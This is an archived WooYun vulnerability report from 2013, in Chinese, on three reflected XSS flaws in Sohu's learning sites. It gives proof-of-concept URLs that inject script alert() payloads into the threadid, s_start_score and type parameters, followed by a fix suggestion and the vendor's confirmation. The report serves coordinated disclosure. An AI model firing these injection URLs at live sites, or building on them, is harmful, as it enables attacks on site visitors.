当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
[起航01]搜狐多处XSS跨站攻击
相关厂商:
漏洞作者:
提交时间:
2013-07-12 15:49
修复时间:
2013-08-26 15:49
公开时间:
2013-08-26 15:49
漏洞类型:
xss跨站脚本攻击
危害等级:
自评Rank:
7
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2013-07-12: 细节已通知厂商并且等待厂商处理中
2013-07-12: 厂商已经确认,细节仅向厂商公开
2013-07-22: 细节向核心白帽子及相关领域专家公开
2013-08-01: 细节向普通白帽子公开
2013-08-11: 细节向实习白帽子公开
2013-08-26: 细节向公众公开

简要描述:

[起航01]搜狐多处XSS跨站攻击
有人说过物理学界遍地是黄金,而如今这句话用在搜狐身上也不为过,可不过这个黄金可是要带引号的,若问黄金为何物?[听说过金粒餐吗?就是那个](*^__^*) 嘻嘻开个玩笑,黄金就是漏洞啦!
(Ps.小弟幸幸苦苦编辑好排版好,请审核的大人手下留情)

详细说明:

漏洞页面(1):
http://club.learning.sohu.com/?action=read&forumid=univtop10&threadid=1lo6mzz2lpx&page=1

threadid=1lo6mzz2lpx 存在XSS漏洞


证明页面:

http://club.learning.sohu.com/?action=read&forumid=univtop10&threadid=1lo6mzz%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E2lpx&page=1

XSS/爆源代码
点评:
这样赤果果的吃进去(输入)然后赤果果的拉出来(输出),也太那个啥了吧

9.jpg


---邪恶的分割线---
漏洞页面(2):
http://daxue.learning.sohu.com/college/custom_line.php?s_start_score=400&s_end_score=550&Submit=88952634&select4=88952634&year=88952634&select4=0

s_start_score=400 存在XSS漏洞


证明页面:

http://daxue.learning.sohu.com/college/custom_line.php?s_start_score=40"/><script>alert(/wooyun/)</script>
0&s_end_score=550&Submit=88952634&select4=88952634&year=88952634&select4=0


点评:

输出不经过任何过滤,难怪要被XSS


10.jpg


---邪恶的分割线---
漏洞页面(3):
http://club.learning.sohu.com/?action=list&forumid=joblife&type=all type=all 存在XSS漏洞
证明页面:

http://club.learning.sohu.com/?action=list&forumid=joblife&type=all%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E


点评:
无力吐槽

11.jpg


综上:

几个小小的XSS增加了俺的信心,接下来几天陆续为您带来搜狐漏洞系列

漏洞证明:

证明页面(1):

http://club.learning.sohu.com/?action=read&forumid=univtop10&threadid=1lo6mzz%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E2lpx&page=1

XSS/爆源代码
证明页面(2):

http://daxue.learning.sohu.com/college/custom_line.php?s_start_score=40"/><script>alert(/wooyun/)</script>
0&s_end_score=550&Submit=88952634&select4=88952634&year=88952634&select4=0


证明页面(3):

http://club.learning.sohu.com/?action=list&forumid=joblife&type=all%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

修复方案:

拉肚子要及时吃止泻药,而对于这种吃下去又完整拉出来造成XSS的情况,我想一定是病得不轻了,赶快吃药吧----即在输出的地方过滤<,>,/,(,)等字符

版权声明:转载请注明来源 zyymartin@乌云


>

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-07-12 16:00

厂商回复:

感谢关注。

最新状态:

暂无